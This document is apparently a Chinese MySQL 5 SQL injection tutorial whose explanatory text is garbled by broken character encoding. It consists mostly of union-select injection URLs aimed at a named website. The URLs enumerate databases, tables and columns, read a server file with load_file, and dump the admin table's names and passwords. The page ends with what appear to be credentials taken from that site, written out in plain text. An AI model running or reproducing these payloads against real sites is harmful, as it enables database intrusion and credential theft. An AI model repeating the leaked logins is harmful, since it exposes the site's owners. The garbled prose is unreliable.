mysqlעЧ
˷ֻMysql 5.0Լ5.0ϰ汾 ע뷽mysql 5˷˶ȡݿٶ,˷DZԭԭǹijţ
ŵڿinformation_schemagroup_concat ﵽһԶȡָݿ,limitƵȻע
ȱ һڼǧͱֶκݵʱ ȡݵʱ൱...
üʵʾ ԭ˵,žעѶ֪.ֻҪʵʾ
עʱʵ仯 ˿ոʹ/**/ ,+ ȵ
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
п:
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
б:
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
бֶ:
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
*/ (97,100,109,105,110)Ϊadminascii
бֶ:
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
http://www.political-security.com/xuekedaohang/xkdh.php?ssort=1&&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
http://www.political-security.com/xuekedaohang/xkdh.php?ssort=1&&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
http://www.political-security.com/xuekedaohang/xkdh.php?ssort=1&&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
http://www.political-security.com/xuekedaohang/xkdh.php?ssort=1&&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
webmaster:dzb521123,simlab:simadmin20043233
ҳ:
[1]